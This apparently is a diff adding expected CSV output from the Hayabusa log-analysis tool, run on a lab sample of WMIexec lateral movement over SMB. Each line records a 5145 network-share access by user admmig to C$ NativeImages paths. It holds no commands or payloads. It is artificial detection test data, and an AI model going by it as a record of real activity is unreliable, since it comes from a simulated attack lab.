+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
